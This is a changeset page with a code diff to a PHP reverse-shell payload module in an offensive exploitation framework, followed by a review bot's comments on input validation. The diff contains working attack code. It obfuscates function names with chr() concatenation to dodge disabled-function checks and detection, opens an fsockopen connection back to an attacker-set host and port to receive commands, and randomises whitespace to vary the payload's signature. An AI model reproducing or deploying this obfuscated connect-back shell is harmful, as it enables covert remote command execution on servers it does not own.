Changeset 5430
- Timestamp:
- 03/04/08 14:50:39 (5 months ago)
- Files:
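--- a/framework3/trunk/modules/payloads/singles/php/reverse_php.rb
+++ b/framework3/trunk/modules/payloads/singles/php/reverse_php.rb
@@ -69,4 +69,8 @@
 def php_reverse_shell
 
+if (!datastore['LHOST'] or datastore['LHOST'].empty?)
+# LHOST should always be set when we get here... but in case it isn't,
+raise Rex::ArgumentError, "LHOST is required"
+end
 ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first
 port = datastore['LPORT']
@@ -80,7 +84,7 @@
 $port=#{port};
 $_=chr(95);$a=chr(97);$b=chr(98);$c=chr(99);$d=chr(100);$e=chr(101);
-$f=chr(102);$h=chr(104);$i=chr(105);$ l=chr(108);$m=chr(109);$n=chr(110);
-$ o=chr(111);$p=chr(112);$r=chr(114);$s=chr(115);$t=chr(116);$u=chr(117);
-$ x=chr(120);$y=chr(121);
+$f=chr(102);$h=chr(104);$i=chr(105);$k=chr(107);$l=chr(108);$m=chr(109);
+$n=chr(110);$o=chr(111);$p=chr(112);$r=chr(114);$s=chr(115);$t=chr(116);
+$u=chr(117);$x=chr(120);$y=chr(121);
 $disabled=@ini_get($d.$i.$s.$a.$b.$l.$e.$_.$f.$u.$n.$c.$t.$i.$o.$n.$s);
 if(!empty($disabled)){
@@ -139,5 +143,5 @@
 $command=NULL;
 $nofuncs=$n.$o.chr(32).$e.$x.$e.$c.chr(32).$f.$u.$n.$c.$t.$i.$o.$n.$s.chr(32).chr(61).chr(40);
-if(is_callable( @f.@s.@o.@c.@k.@o.@p.@e.@n)and!in_array(@f.@s.@o.@c.@k.@o.@p.@e.@n,$disabled)){
+if(is_callable($f.$s.$o.$c.$k.$o.$p.$e.$n)and!in_array($f.$s.$o.$c.$k.$o.$p.$e.$n,$disabled)){
 $sock=fsockopen($ipaddr,$port);
 while($cmd=fread($sock,2048)){
@@ -165,10 +169,8 @@
 END_OF_PHP_CODE
 
-shell.gsub!(/[\t\n]+/, "\t")
-# spaces are important but there's no need for tabs and newlines, so
-# randomize them bit
-shell.gsub!("\t") { |s|
+# randomize the spaces a bit
+shell.gsub!(/\s+/) { |s|
 len = rand(5)+2
-set = "\x09\x20\x0 d\x0a"
+set = "\x09\x20\x0a"
 buf = ''
 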
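Review bot: The new guard at the top of `php_reverse_shell` rejects only a nil or empty `LHOST`, while the `ipaddr = ...split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first` line right after it assumes a dotted-quad IPv4 string. A hostname or an IPv6 literal would presumably pass the guard and yield a wrong or nil `ipaddr` without any error, so the failure would only surface later in the generated script. Consider failing at the same place with a format check, e.g. `raise Rex::ArgumentError, "LHOST must be a dotted-quad IPv4 address" unless datastore['LHOST'] =~ /\A\d{1,3}(\.\d{1,3}){3}\z/`. The added comment also trails off at a comma; finishing the sentence (`# ... but in case it isn't, fail early with a clear error`) would make the intent explicit. The body of `php_reverse_shell` continues outside the hunks shown.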
